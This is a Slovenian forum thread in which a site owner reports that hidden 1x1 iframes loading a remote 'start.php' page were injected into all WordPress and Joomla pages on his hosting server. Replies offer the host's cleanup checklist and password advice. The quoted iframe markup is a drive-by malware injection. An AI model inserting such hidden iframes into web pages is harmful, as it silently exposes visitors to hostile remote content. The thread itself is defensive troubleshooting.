vdor na strežnik - supergreenhosting

10 naročnikov

Pozdrav.

Včeraj mi google webmaster tools javil, da se je na eni WP strani pojavila nevarna vsebina, danes mal čekiram in vidim, da se je na vseh straneh na tem strežniku (wordpress in joomla) pojavila naslednja koda:

<iframe width="1" height="1" src="http://guwtron.com/gizmod/start.php?id=vlnd"></iframe><iframe width="1" height="1" src="http://guwtron.com/gizmod/start.php?id=vlnd"></iframe><iframe width="1" height="1" src="http://guwtron.com/gizmod/start.php?id=vlnd"></iframe><iframe width="1" height="1" src="http://guwtron.com/gizmod/start.php?id=vlnd"></iframe>

s tem problemom se prvič soočam, tako da kaj je za narediti v tem primeru? na support od super green hostinga sm že pisal, spremenil sm kode oz jih še spreminjam. kaj je še za narediti preden google pošlje v banovce vse moje strani?

a kodo se fizično odstrani z vseh strani al kako?

hvala vsem za odgovore..

Če nimajo backupov bo treba na roke spreminjat vse fajle..

tole so mi poslali s supporta:

If your website has been hacked then I advise you to do following:
1. Check all computers used by you to manage the account using some latest
antivirus software
2. Log into your cpanel and change your cPanel/FTP password to something hard
guessed like Ajtgn4AJZN
3. Update all applications and components installed by you into your
account up to the latest version.
4. Please upload the entire content of your site on a local PC, scan for viruses.
5. Please don't install suspicious software, plugins, extensions, etc..

It should solve the issue.
Please refer to Google via the link http://www.google.com/webmasters/tools/ so that reiterated that Google would rescan your page again.

sej u WPji je sam u index.php 2 vrstici te kode, tako da bo šlo hitro, čeprav mam mal težav z dostopom do admina, za joomlo bom pa še pogledal.

kako lahko še zaščitim server u cpaneli razen da spremenim geslo?

Preventiva. Reden backup. :)

Uporabljas morda Filezillo za FTP dostop?

Core FTP Lite uporabljam

Si pozabil kaj nadgraditi na zadnjo verzijo?

Imaš morda na kakem od njih default username in password?

wordpressa nisem imel zadnje verzije na vseh straneh, sedaj sem updejtal. default imen in gesel nimam, uporabljam pa več ali manj podobna gesla.

sem se pa poleti udeležil 30dc channel in osnovno stran na strežniku sem naredil preko wordpress directa, kamor sem vpisal tudi podatke za ftp dostop do strežnika, da je lahko naložil stran gor. zanimivo pa je, da mi ravno zadnje dni pošiljajo iz WP directa, da se trial mode izteka in ravno včeraj, ko je prišlo do tega, se je WP direct trial mode tudi dokončno iztekel... le naklučje?

Si se pozanimal če se je še komu po preteku tega po tujih forumih?

Meni se je lani nekaj podobnega zgodilo. Imel sem shranjeno ftp geslo v Firefoxu za FireFTP. Najverjetneje sem dobil en virus, ki mi je prebral shranjeno ftp geslo in poslal ftp geslo nepridipravom, ki so se nato z boti prijavili z mojim geslom in mi v vse index.php datoteke dodali iframe na ruske strani. To sem videl iz ftp loga, kjer je bilo polno različnih ruskih IP-jev, ki so se prijavljali z mojim geslom.

Po tej izkušnji nikoli več ne shranjujem pomembnejših gesel (ftp, banka, paypal...) v programe, ampak jih vedno ročno vnesem ob vsakokratni uporabi.

@Gogy: nisem še imel časa pogledat, če majo tud drugi podobne izkušnje, bom danes mal poguglal

@jondoe: ja verjetno bo res treba mal premislit o teh geslih kako in kaj, ker seveda obstaja velika možnost, da so tud do mojega gesla prišli na ta način.

ko smo že ravno pri virusih in trojancih, katere antivirusne uporabljate? jst doma na win7 uporabljam Microsoft security essentials, v službi pa Aviro.